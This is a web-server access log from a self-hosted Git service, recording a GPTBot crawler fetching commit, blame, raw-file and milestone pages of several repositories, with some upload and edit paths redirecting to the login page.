"/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11295] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12995] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10237] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 12788] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" +[17/Feb/2026:15:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18063] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10982] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 18045] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject" [Client 74.7.227.38] [Length 242056] [Gzip 16.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" +[17/Feb/2026:15:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md?display=source" [Client 74.7.227.38] [Length 11760] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" +[17/Feb/2026:15:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" +[17/Feb/2026:15:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14470] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16685] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 15089] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" +[17/Feb/2026:15:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8505] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=closestduedate&state=open" +[17/Feb/2026:15:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=closestduedate&state=open" +[17/Feb/2026:15:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70893] [Gzip 29.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest" [Client 74.7.227.38] [Length 10716] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:15:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 18047] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11319] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:15:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8513] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:15:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8514] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:15:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:15:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:15:59:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" +[17/Feb/2026:15:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest" +[17/Feb/2026:15:59:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" +[17/Feb/2026:15:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest" +[17/Feb/2026:15:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest" [Client 74.7.227.38] [Length 9800] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" +[17/Feb/2026:15:59:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" +[17/Feb/2026:15:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest" +[17/Feb/2026:15:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:15:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21355] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21356] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13691] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:15:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:15:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:15:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13099] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:15:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11665] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" +[17/Feb/2026:15:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11665] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" +[17/Feb/2026:15:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11664] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 